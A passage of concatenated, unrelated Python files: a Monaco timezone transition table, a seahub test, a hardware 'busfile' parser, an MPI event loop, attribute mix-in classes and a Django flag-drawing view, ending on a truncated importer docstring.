d(1988,9,25,1,0,0),
d(1989,3,26,1,0,0),
d(1989,9,24,1,0,0),
d(1990,3,25,1,0,0),
d(1990,9,30,1,0,0),
d(1991,3,31,1,0,0),
d(1991,9,29,1,0,0),
d(1992,3,29,1,0,0),
d(1992,9,27,1,0,0),
d(1993,3,28,1,0,0),
d(1993,9,26,1,0,0),
d(1994,3,27,1,0,0),
d(1994,9,25,1,0,0),
d(1995,3,26,1,0,0),
d(1995,9,24,1,0,0),
d(1996,3,31,1,0,0),
d(1996,10,27,1,0,0),
d(1997,3,30,1,0,0),
d(1997,10,26,1,0,0),
d(1998,3,29,1,0,0),
d(1998,10,25,1,0,0),
d(1999,3,28,1,0,0),
d(1999,10,31,1,0,0),
d(2000,3,26,1,0,0),
d(2000,10,29,1,0,0),
d(2001,3,25,1,0,0),
d(2001,10,28,1,0,0),
d(2002,3,31,1,0,0),
d(2002,10,27,1,0,0),
d(2003,3,30,1,0,0),
d(2003,10,26,1,0,0),
d(2004,3,28,1,0,0),
d(2004,10,31,1,0,0),
d(2005,3,27,1,0,0),
d(2005,10,30,1,0,0),
d(2006,3,26,1,0,0),
d(2006,10,29,1,0,0),
d(2007,3,25,1,0,0),
d(2007,10,28,1,0,0),
d(2008,3,30,1,0,0),
d(2008,10,26,1,0,0),
d(2009,3,29,1,0,0),
d(2009,10,25,1,0,0),
d(2010,3,28,1,0,0),
d(2010,10,31,1,0,0),
d(2011,3,27,1,0,0),
d(2011,10,30,1,0,0),
d(2012,3,25,1,0,0),
d(2012,10,28,1,0,0),
d(2013,3,31,1,0,0),
d(2013,10,27,1,0,0),
d(2014,3,30,1,0,0),
d(2014,10,26,1,0,0),
d(2015,3,29,1,0,0),
d(2015,10,25,1,0,0),
d(2016,3,27,1,0,0),
d(2016,10,30,1,0,0),
d(2017,3,26,1,0,0),
d(2017,10,29,1,0,0),
d(2018,3,25,1,0,0),
d(2018,10,28,1,0,0),
d(2019,3,31,1,0,0),
d(2019,10,27,1,0,0),
d(2020,3,29,1,0,0),
d(2020,10,25,1,0,0),
d(2021,3,28,1,0,0),
d(2021,10,31,1,0,0),
d(2022,3,27,1,0,0),
d(2022,10,30,1,0,0),
d(2023,3,26,1,0,0),
d(2023,10,29,1,0,0),
d(2024,3,31,1,0,0),
d(2024,10,27,1,0,0),
d(2025,3,30,1,0,0),
d(2025,10,26,1,0,0),
d(2026,3,29,1,0,0),
d(2026,10,25,1,0,0),
d(2027,3,28,1,0,0),
d(2027,10,31,1,0,0),
d(2028,3,26,1,0,0),
d(2028,10,29,1,0,0),
d(2029,3,25,1,0,0),
d(2029,10,28,1,0,0),
d(2030,3,31,1,0,0),
d(2030,10,27,1,0,0),
d(2031,3,30,1,0,0),
d(2031,10,26,1,0,0),
d(2032,3,28,1,0,0),
d(2032,10,31,1,0,0),
d(2033,3,27,1,0,0),
d(2033,10,30,1,0,0),
d(2034,3,26,1,0,0),
d(2034,10,29,1,0,0),
d(2035,3,25,1,0,0),
d(2035,10,28,1,0,0),
d(2036,3,30,1,0,0),
d(2036,10,26,1,0,0),
d(2037,3,29,1,0,0),
d(2037,10,25,1,0,0),
]
_transition_info = [
i(540,0,'PMT'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(7200,7200,'WEMT'),
i(3600,3600,'WEST'),
i(7200,7200,'WEMT'),
i(3600,3600,'WEST'),
i(7200,7200,'WEMT'),
i(3600,3600,'WEST'),
i(7200,7200,'WEMT'),
i(3600,3600,'WEST'),
i(7200,7200,'WEMT'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
]
Monaco = Monaco()
|
from seahub.tags.models import FileUUIDMap
from seahub.test_utils import BaseTestCase
from seaserv import seafile_api
class FileUUIDMapManagerTest(BaseTestCase):
def setUp(self):
self.login_as(self.user)
self.repo = seafile_api.get_repo(self.create_repo(name='test-repo', desc='',
username=self.user.username,
passwd=None))
def test_get_fileuuid_by_uuid(self):
args = (self.repo.id, '/', 'dev', True)
uuid_obj = FileUUIDMap.objects.get_or_create_fileuuidmap(*args)
uuidmap_obj = FileUUIDMap.objects.get_fileuuidmap_by_uuid(uuid_obj.uuid)
assert uuid_obj == uuidmap_obj
def test_create(self):
args = (self.repo.id, '/', 'dev_create', True)
uuidmap_obj = FileUUIDMap.objects.get_or_create_fileuuidmap(*args)
data = (uuidmap_obj.repo_id, uuidmap_obj.parent_path, uuidmap_obj.filename, uuidmap_obj.is_dir)
assert args == data
def test_file_uuidmap_by_path(self):
args = (self.repo.id, '/', 'dev_by_path', True)
assert None == FileUUIDMap.objects.get_fileuuidmap_by_path(*args)
uuidmap_obj = FileUUIDMap.objects.get_or_create_fileuuidmap(*args)
assert uuidmap_obj == FileUUIDMap.objects.get_fileuuidmap_by_path(*args)
|
"""Return a dict containing information specified in an input busfile
Given a valid path to a file with either the .bus or .txt extension, attempts
to load the information specified by the file into numpy arrays and return the
information contained in the file as a dict. This dict will have keys 'params',
'signals', and 'outputs'. Each entry in the dict is, itself, a dict containing
information read from the busfile.
Positional arguments:
path: String that gives a path from the module to the busfile.
"""
import argparse
import os
import logging
from unit import unit
class ParseError(Exception):
"""Base class for exceptions in this module"""
pass
class ParamMissingError(ParseError):
"""Exception raised if not all required parameters were in the bus file
Attributes:
message -- message indicating cause of failure
"""
def __init__(self, param):
self.message = "Required parameter '{}' was not found in bus file"\
.format(param)
class NameExpandError(ParseError):
"""Exception raised if a bus name was improperly specified
Attribute:
message -- message containing the signal that expand_signal failed to
expand
"""
def __init__(self, signal):
self.message = 'Improperly formatted bus signal: {}'.format(signal)
class VectorRangeError(ParseError):
"""Exception raised if an attempt to expand a vector range fails
Attributes:
message -- error message containing the string that expand_vector
failed to expand
"""
def __init__(self, vector):
self.message = 'Bad vector range: {}'.format(vector)
def bin_str(tok):
"""Returns a binary string equivalent to the input value.
Given a string that represents a binary number (with or without a '0b') or
a hex value with a '0x' in front, converts the value to a string of 1s and
0s. If a hex value is specified, each hex digit specifies four bits.
"""
if tok.startswith('0x'): # Specified as hex
# Calculate the length of the binary string if each hex digit
# specifies 4 binary digits
bin_strlen = 4 * (len(tok) - 2)
# Convert hex value to binary
intval = int(tok[2:], 16) # Convert hex value to integer
binstr = bin(intval) # Convert integer value to binary string with '0b'
bitstr = binstr[2:] # Get rid of the '0b'
bits = bitstr.zfill(bin_strlen) # Left-pad string with the zeros
elif tok.startswith('0b'): # Specified as binary
bits = tok[2:]
else: # Base not specified - assume binary literal
bits = tok
return bits
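# For example: bin_str('0x2A') -> '00101010', bin_str('0b101') -> '101',
# and bin_str('1100') -> '1100' (unprefixed tokens are assumed to be binary).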
def expand_vector(range_token):
"""Expands busfile vector notation into a list of strings"""
range_parts = range_token.split(']')
# We now have a list of strings of the following format:
# ['[n_bits', '(lo_val, hi_val)']
try:
n_bits = int(range_parts[0][1:]) # Remove leading '[' from nbits
except IndexError:
logging.critical('Bad vector range: {}'.format(range_token))
raise
# Generate a list with two integer elements that will specify the numeric
# bounds to the values we will expand
try:
range_parts = range_parts[1].split(',') # Split high and low of range
assert len(range_parts) in (2,3)
# Account for difference in start/stop/step vs. start/stop syntax
if len(range_parts) == 2:
start = range_parts[0]
step = 1
stop = range_parts[1]
elif len(range_parts) == 3:
start = range_parts[0]
step = int(range_parts[1])
stop = range_parts[2]
        # Handle different bases for the start value. Note that the leading '('
        # of the range is still attached to this token, hence the '(0x'/'(0b'
        # prefixes and the extra leading character stripped below.
        if start.lower().startswith('(0x'):
            # Convert to integer using base 16
            start = int(start[3:], 16)
        elif start.lower().startswith('(0b'):
            # Convert to integer using base 2
            start = int(start[3:], 2)
        else:
            # Convert to integer using base 10
            start = int(start[1:])
# Handle different bases for the end value
if stop.lower().startswith('0x'):
# Convert to integer using base 16
stop = int(stop[2:-1], 16)
elif stop.lower().startswith('0b'):
# Convert to integer using base 2
stop = int(stop[2:-1], 2)
else:
# Convert to integer using base 10
stop = int(stop[:-1])
except (IndexError, AssertionError):
logging.critical('Bad vector range: {}'.format(range_token))
raise
    if stop >= 2**n_bits: # Ensure the user left enough bits for the range
logging.critical('Insufficient bits to express range for vector {}'\
.format(range_token))
raise VectorRangeError(range_token)
    # Compare the converted integer bounds (not the raw string tokens) and build
    # the range in the requested direction.
    direction = 1 if start < stop else -1
    if direction == 1:
        value_range = range(start, stop + 1, step)
    else:
        value_range = range(start, stop - 1, -step)
    expanded_range = []
    logging.debug('expanded range: {}'.format(list(value_range)))
    for n in value_range:
        # 'bits' rather than 'bin_str' to avoid shadowing the helper above
        bits = format(n, 'b').zfill(n_bits)
        expanded_range.append(bits)
    return expanded_range
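# For example, with the range parsing above: expand_vector('[3](1,5)') returns
# ['001', '010', '011', '100', '101'].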
def read_vectors(f_obj, signals):
"""Read bit vectors from the busfile into a list.
Reads bit vectors line-by-line. Expands any value ranges as it finds them.
Returns a list of binary numbers represented as strings of 1s and 0s.
Positional arguments:
f_obj -- file object for busfile. The position should be set to the
beginning of a line that starts with 'Vectors:'
signals -- Python list of signal names. These should be in the same
order that bits will be specified in these vectors.
"""
# Ensure that our position in f_obj is at the beginning of a 'Vectors:'
# section
line = f_obj.readline()
tokens = [tok.strip() for tok in line.strip().split()]
assert tokens[0] == 'Vectors:', "keyword 'Vectors:' expected, found {}"\
.format(tokens[0])
# Read in and tokenize another line
fposition = f_obj.tell()
line = f_obj.readline()
tokens = [tok.strip() for tok in line.strip().split()]
# Initialize a dictionary with signal names as keys and empty strings as
# entries. 1s and 0s will be appended to these empty strings as we read in
# bit vectors
signal_dict = dict([(sig, '') for sig in signals])
# Our vectors array is going to be an array of strings. Each of these
# strings must have a length equal to the number of signals we are
# specifying, but the number of strings could vary from 1 to however large
# a user-specified range is.
vectors = []
while line != '' and tokens[0].lower() != 'outputs:':
line_vectors = [''] # Temporary holding place for this line's vectors
        # If we come across a line where 'Outputs:' is the first token on the
        # line, we stop reading vectors and return our inputs
for tok in tokens:
if '[' not in tok and ']' not in tok:
                # No range specified by token. Add the bits from this token to
                # the end of each vector we've found on this line
line_vectors = [vect + bin_str(tok) for vect in line_vectors]
else:
# This token specifies a range of values we need to expand.
vector_range = expand_vector(tok)
# If we've previously expanded a range, line_vectors will have
                # length > 1. If this is the case, the length of vector_range
# should be the same as that of line_vectors. We don't allow
# expanding two ranges of different sizes on the same line.
if len(line_vectors) > 1:
assert len(vector_range) == len(line_vectors), \
'ranges on same line must have same length'
# Create a new list of vectors where our new range is
# appended element-wise onto the old range
line_vectors = [old + new for (old, new) in \
zip(line_vectors, vector_range)]
else:
# If we've not previously encountered a range, our list
# size needs to be increased to that of the range we just
# read.
line_vectors = [line_vectors[0] + v for v in vector_range]
for vect in line_vectors:
assert len(vect) == len(signals),\
'Vector {} has length {} and should have length {}.'\
.format(vect, len(vect), len(signals))
vectors.extend(line_vectors)
# Read in and tokenize another line
fposition = f_obj.tell()
line = f_obj.readline()
# We want to eat blank lines, but also if we hit EOF we shouldn't try
# to keep reading lines. Also: eat comment lines
while not line.strip() or line[0] == '#':
# If line evaluates to true, it's a blank line, not EOF.
if line:
fposition = f_obj.tell()
line = f_obj.readline()
else:
# line == '', we've hit EOF. When the main while loop for this
# function sees that line == '', the loop will exit.
break # line == '', we've hit EOF.
tokens = [tok.strip() for tok in line.strip().split()]
f_obj.seek(fposition)
return vectors
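# Illustrative: with signals ['clk', 'a[1]', 'a[0]'] and a single vector line
# '1 [2](0,3)', read_vectors returns ['100', '101', '110', '111'] (the range is
# expanded row-wise, one vector per value).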
def expand_signal(signal):
"""Returns a list of 1-wire signals from a signal specified as a bus
Given a string of the form: "name[left:right]suffix", expands into a series
of signals of the form: "name[#]". If the supplied string is not formatted
correctly, this function will raise exceptions.
"""
# Anatomy of a bus signal: name[left:right]suffix
name, lbrack, tail = signal.partition('[')
left, colon, end = tail.partition(':')
right, rbrack, suffix = end.partition(']')
if not name:
msg = 'No signal name found for signal {}'.format(signal)
logging.critical(msg)
raise NameExpandError(signal)
# Only expand a complete bus - force users to be specific instead of
# assuming what they wanted and giving them bogus results
nodes = []
if lbrack and colon and rbrack:
try:
start = int(left)
stop = int(right)
except ValueError:
msg = 'Bad bus range: Start: {} Stop: {}.'.format(left, right)
logging.critical(msg)
raise NameExpandError(signal)
inc = 1 if (stop > start) else -1 # [4:0] or [0:4]
signal_bus = range(start, (stop + inc), inc)
for wire in signal_bus:
single_signal = '%s[%i]%s' % (name, wire, suffix)
nodes.append(single_signal)
else:
# Partial bus notation - error
msg = 'Improperly specified bus signal: {}'.format(signal)
logging.critical('One of ([,:,]) is missing from bus signal {}'\
.format(signal))
raise NameExpandError(signal)
return nodes
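# For example: expand_signal('data[3:0]') returns
# ['data[3]', 'data[2]', 'data[1]', 'data[0]'].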
def read_signals(f_obj):
"""Return a list of signals defined by the busfile
Reads a list of signal names from the bus file. Names may use square
brackets to describe a multi-wire bus. Buses will be expanded to
individual signals.
Positional argument:
f_obj -- File object for the bus file. Current position in the file
should be the beginning of the 'Signals:' section
"""
fposition = f_obj.tell()
line = f_obj.readline()
while not line.strip() or line[0] == '#':
fposition = f_obj.tell()
line = f_obj.readline()
# Make sure that we are at the beginning of the signal declaration section.
# We know we're there if the first token on the first line we read in is
# 'Signals:'.
tokens = [tok.strip() for tok in line.strip().split()]
assert tokens[0].lower() == 'signals:' or tokens[0].lower() == 'outputs:',\
"keyword 'Signals:' or 'Outputs:' expected, found {}" \
.format(tokens[0])
# 'Signals:' should be alone on its line. Read in the next line.
fposition = f_obj.tell()
line = f_obj.readline()
# Ignore empty lines and comments
while not line.strip() or line[0] == '#':
fposition = f_obj.tell()
line = f_obj.readline()
sig_names = [tok.strip() for tok in line.strip().split()]
# Everything from this point in the file until we find a line that begins
# with the token 'Vectors:' will be taken to be a signal. Blank lines are
# ignored, as are comment lines.
signals = []
while sig_names[0].lower() != 'vectors:':
for sig in sig_names:
# Check whether the signal is a bus. If it is, expand the signal
# bus into individual wires. If the signal is already a single wire
# we add it to our list straight away. We go into our bus
# processing function if we find *either* a '[' or a ']' because
# expand_signal contains logic that informs the user if their
# bus signal declaration is incorrect.
if '[' in sig or ']' in sig:
individual_signals = expand_signal(sig)
signals.extend(individual_signals)
else:
signals.append(sig)
# Read and tokenize a new line
fposition = f_obj.tell()
line = f_obj.readline()
# Ignore empty lines and comments
while not line.strip() or line[0] == '#':
fposition = f_obj.tell()
line = f_obj.readline()
if line == '':
raise NameExpandError(\
"'Vectors:' keyword not reached before EOL")
sig_names = [tok.strip() for tok in line.strip().split()]
# We just found the 'Vectors:' line. Reset our position in f_obj to the
# beginning of that line so that the read_vectors function can verify that
# it's in the right place
f_obj.seek(fposition)
return signals
def read_params(f_obj):
"""Return a dict containing name, value pairs from the bus file
Starts looking at the beginning of the file for a line that isn't a comment
or whitespace. It tokenizes each line that it finds and attempts to match
the first token on the line with a valid parameter name. If there is a
match, the value of the parameter is shown. Otherwise, a warning is
displayed.
Positional argument:
f_obj: File object returned by open() for the bus file.
"""
params = {}
# Required parameters
logging.debug('Searching for input parameters')
required_params = ['risefall', 'bittime', 'bitlow', 'bithigh']
# Optional parameters
params['edge'] = 'rising'
params['clockdelay'] = None
params['clockrisefall'] = None
params['tsu'] = None
params['th'] = None
for p in required_params:
params[p] = None
fposition = f_obj.tell()
line = f_obj.readline()
# Ignore empty lines and comments
while not line.strip() or line[0] == '#':
fposition = f_obj.tell()
line = f_obj.readline()
# Read in parameters, ignoring blank lines
while line.split()[0].lower() != 'signals:':
assert '=' in line, 'improperly formatted param line: {}'.format(line)
name, value = line.split('=')
name = name.strip().lower()
# Add read-in param to our dict, if it is a valid param.
# If it is not a valid param, warn the user.
if name in params:
value = value.strip()
params[name] = value
logging.info('Parameter {} set to {}'.format(name, value))
else:
            logging.error('Unknown parameter encountered: {}'.format(name))
fposition = f_obj.tell()
line = f_obj.readline()
# Ignore empty lines and comments
        while not line.strip() or line[0] == '#':
fposition = f_obj.tell()
line = f_obj.readline()
# Put file position back to the beginning of the line that did not start
# with a parameter name.
f_obj.seek(fposition)
# Ensure that we have all of the required parameters. Raise an exception if
# a required param is missing. We put all of these parameters into our
# params dict with the value None. If any of our required params evaluate
# as false now, we know we didn't find it in our bus file.
for p in required_params:
if not params[p]:
            raise ParamMissingError(p)
valid_edge_settings = ('rising', 'falling')
assert params['edge'] in valid_edge_settings,\
'Invalid edge value: {}. Valid values are: {}'\
.format(params['edge'], valid_edge_settings)
return params
def parse_busfile(buspath):
"""Return a dict containing information from a busfile.
Positional argument:
path: String that gives a path from this module to the busfile
"""
file_contents = {'params': {}, 'signals': {}, 'outputs': {}}
try:
with open(buspath) as f:
file_contents['params'] = read_params(f)
# Read signal labels from the first line following parameters
signals = read_signals(f)
# Read signal vectors
vectors = read_vectors(f, signals)
# Prepare to load in vectors
for sig in signals:
file_contents['signals'][sig] = ''
# Create signal dict from vectors and signals
for vect in vectors:
for (sig, bit) in zip(signals, vect):
file_contents['signals'][sig] += bit
# Read in the next line from the file. There are only two things
# it can be if no exceptions were thrown by read_vectors: it can
# be EOF, or it can start with 'Outputs:'.
line = f.readline()
if line.lower().startswith('outputs:'):
assert 'th' in file_contents['params'].keys(), \
'Outputs were specified for verification but no hold \
time ("th") was specified to use for verification.'
assert 'tsu' in file_contents['params'].keys(), \
'Outputs were specified for verification but no setup \
time ("tsu") was specified to use for verification.'
output_signals = read_signals(f)
logging.info('Output signals: {}'.format(str(output_signals)))
output_vectors = read_vectors(f, output_signals)
for sig in output_signals:
file_contents['outputs'][sig] = ''
for vect in output_vectors:
for (sig, bit) in zip(output_signals, vect):
file_contents['outputs'][sig] += bit
# Check that an output was specified for all inputs
input_sig = list(file_contents['signals'].keys())[0]
output_sig = list(file_contents['outputs'].keys())[0]
n_input_vectors = len(file_contents['signals'][input_sig])
n_output_vectors = len(file_contents['outputs'][output_sig])
assert n_input_vectors == n_output_vectors, \
'Number of output vectors ({}) does not match number \
of input vectors ({})'.format(n_output_vectors, n_input_vectors)
elif line == '':
logging.info('No output signals detected')
else:
logging.error('Expected "outputs:" or EOF, got {}'\
.format(line))
except FileNotFoundError:
msg = 'No bus file exists at {}'.format(buspath)
logging.critical(msg)
raise
return file_contents
def write_busfile(file_contents):
"""Writes the contents of a busfile to a text file. Useful for debugging"""
with open('busout.txt', 'w') as f:
for key in file_contents['params']:
f.write('{}, {}\n'.format(key, file_contents['params'][key]))
f.write('\n')
f.write('\nSignals:\n')
for sig in file_contents['signals']:
f.write('{}, {}\n'.format(sig, file_contents['signals'][sig]))
f.write('\nOutputs:\n')
for sig in file_contents['outputs']:
f.write('{}, {}\n'.format(sig, file_contents['outputs'][sig]))
if __name__ == '__main__':
"""Barebones interface for calling this module standalone
This is useful for debugging.
"""
parser = argparse.ArgumentParser()
parser.add_argument('file')
args = parser.parse_args()
path = os.path.abspath(args.file)
write_busfile(parse_busfile(path))
|
import asyncio
from oremda.typing import MPINodeReadyMessage, OperateTaskMessage, Message, MessageType
from oremda.utils.concurrency import ThreadPoolSingleton
from oremda.utils.mpi import mpi_world_size
from .event_loop import MPIEventLoop
class MPIRootEventLoop(MPIEventLoop):
"""Forward messages between the messages queue and MPI nodes"""
async def loop(self, rank):
while True:
# Wait until the node indicates it is ready
msg = await self.mpi_recv(rank)
ready_msg = MPINodeReadyMessage(**msg.dict())
queue = ready_msg.queue
# Wait until a task becomes available for the node
msg = await self.mqp_recv(queue)
# Forward the input to the node
await self.mpi_send(msg, rank)
# Check if it was a terminate message. If so, we can end our loop.
task_message = Message(**msg.dict())
if task_message.type == MessageType.Terminate:
break
# It must have been an OperateTaskMessage. Read the output queue.
operate_message = OperateTaskMessage(**msg.dict())
output_queue = operate_message.output_queue
# Get the output from the node
output = await self.mpi_recv(rank)
# Put the output on the message queue
await self.mqp_send(output, output_queue)
def start_event_loop(self):
if self.started:
# Already started...
return
def run_loop():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
# Use our ThreadPoolExecutor singleton for the asyncio executor
loop.set_default_executor(ThreadPoolSingleton().executor)
for i in range(1, mpi_world_size):
task = loop.create_task(self.loop(i))
self.tasks.append(task)
# Run until all tasks complete
loop.run_until_complete(asyncio.gather(*self.tasks))
future = ThreadPoolSingleton().submit(run_loop)
self.started = True
return future
|
"""Mix-in classes for easy attribute setting and pretty representation
>>> class T(HasInitableAttributes, HasTypedAttributes, IsCallable):
... spam = str
... def __init__(self, eggs, ham = 'ham'): pass
...
>>> t = T('bacon'); t(ham = 'eggs'); t.spam += 'sausage'; t
__main__.T('bacon', ham = 'eggs', spam = 'sausage')
>>>
"""
from inspect import getargspec
from itertools import chain
class HasInitableAttributes(object):
"""Initializes attributes automatically
>>> class T(HasInitableAttributes):
... z = 0
... def __init__(self, x, y=0, **opts): pass
...
>>> t = T(0, a = 1); t
__main__.T(0, a = 1)
>>> t.x, t.y, t.z = 1, 2, 3; t
__main__.T(1, y = 2, a = 1, z = 3)
>>>
"""
def __new__(cls, *pars, **opts):
"Initialize all attributes in the signature and any other options supplied"
try:
self = super().__new__(cls, *pars, **opts)
except:
self = super().__new__(cls)
self._argspec = names, parsname, optsname, defaults = getargspec(self.__init__)
if not defaults: defaults = []
n = len(names) - len(defaults) - 1
if n - len(pars) > 0:
_s, _to = ('s', '-%d' % (n-1)) if n - len(pars) > 1 else ('', '')
missing = "%s %s (pos %d%s)" % (_s, ", ".join(names[1:n+1]), len(pars), _to)
raise TypeError("Required argument%s not found." % missing)
for n, v in chain(zip(names[-len(defaults):], defaults), zip(names[1:], pars), opts.items()):
setattr(self, n, v)
return self
def __repr__(self):
"Show all attributes in the signature and any other public attributes that are changed"
names, parsname, optsname, defaults = self._argspec
if not defaults: defaults = []
optnames = names[-len(defaults):] if defaults else []
optvalues = (getattr(self, name) for name in optnames)
othernames = sorted(set((n for n in self.__dict__ if n[0] != '_')) - set(names))
othervalues = list((getattr(self, name, None) for name in othernames))
otherdefaults = list((getattr(self.__class__, name, None) for name in othernames))
return "%s.%s(%s)" % (self.__module__, self.__class__.__name__, ", ".join(chain(
(repr(getattr(self, name)) for name in names[1:len(names)-len(defaults)]),
("%s = %r" % (name, value) for name, value, default in zip(optnames, optvalues, defaults) if value != default),
("%s = %r" % (name, value) for name, value, default in zip(othernames, othervalues, otherdefaults) if value != default))))
class HasTypedAttributes(object):
"""Objectifies class attributes automatically
>>> class T(HasTypedAttributes):
... spam = str
... class C(HasTypedAttributes):
... eggs = list
...
>>> a, b = T(), T(); a.spam += 'ham'; a.C.eggs.append('bacon'); a.spam, b.spam, a.C.eggs, b.C.eggs
('ham', '', ['bacon'], [])
>>>
"""
def __new__(cls, *pars, **opts):
try:
self = super().__new__(cls, *pars, **opts)
except:
self = super().__new__(cls)
for name in dir(self):
if name[0] != '_':
value = getattr(self, name)
if isinstance(value, type):
setattr(self, name, value(opts.pop(name)) if name in opts else value())
        if opts:
            if len(opts) == 1:
                raise TypeError("__init__() got an unexpected keyword argument %r"
                    % next(iter(opts)))
            raise TypeError("__init__() got unexpected keyword arguments %r"
                % sorted(opts))
return self
class IsCallable(object):
"""Update attributes by calling
>>> class T(IsCallable):
... x = 0
...
>>> t = T(); t(x=1, y=2); t.x, t.y
(1, 2)
"""
def __call__(self, *pars, **opts):
self.__dict__.update(*pars, **opts)
if __name__ == '__main__':
from doctest import testmod
testmod()
class T(HasInitableAttributes, HasTypedAttributes, IsCallable):
spam = str
t = T()
assert t.spam != str
|
from time import sleep
from rest_framework import status
from rest_framework.renderers import TemplateHTMLRenderer
from rest_framework.response import Response
from rest_framework.views import APIView
from app.core.draw_flag_scripts.flag import Flag3
from app.core.serializers import DrawFlagSerializer
from app.core.tasks import shared_task_draw_flag
from app.core.web_sockets.send_massage import SendMassageWS
class DrawFlagAPIView(APIView):
renderer_classes = [TemplateHTMLRenderer]
template_name = 'flag.html'
@classmethod
def get(cls, request, *args, **kwargs):
return Response(data={'serializer': DrawFlagSerializer()}, status=status.HTTP_200_OK)
@classmethod
def post(cls, request, *args, **kwargs):
SendMassageWS.send_ws_msg(
chat_name='lobby',
title='hello',
msg='world'
)
sleep(.5)
serializer = DrawFlagSerializer(data=request.data)
if not serializer.is_valid():
out_data = {
'serializer': DrawFlagSerializer(),
'errors': [
*serializer.errors.get('non_field_errors', []),
*serializer.errors.get('even_number', [])
]
}
return Response(data=out_data, status=status.HTTP_400_BAD_REQUEST)
if not (flag_obj := Flag3.get_flag_object()):
out_data = {
'serializer': DrawFlagSerializer(),
'errors': ["Check your data base - you do not have flag object!"]
}
return Response(data=out_data, status=status.HTTP_400_BAD_REQUEST)
""" normal way """
# out_data = {
# 'serializer': DrawFlagSerializer(),
# 'flag': Flag3(
# number=serializer.validated_data.get('even_number'),
# flag_obj_id=flag_obj.id
# ).print_flag()
# }
""" celery """
celery_result = shared_task_draw_flag.delay(
even_number=serializer.validated_data.get('even_number'),
flag_obj_id=flag_obj.id
)
out_data = {
'serializer': DrawFlagSerializer(),
'flag': celery_result.get()
}
return Response(data=out_data, status=status.HTTP_200_OK)
|
"""
Custom importer that additionally rewrites code of all imported modules.
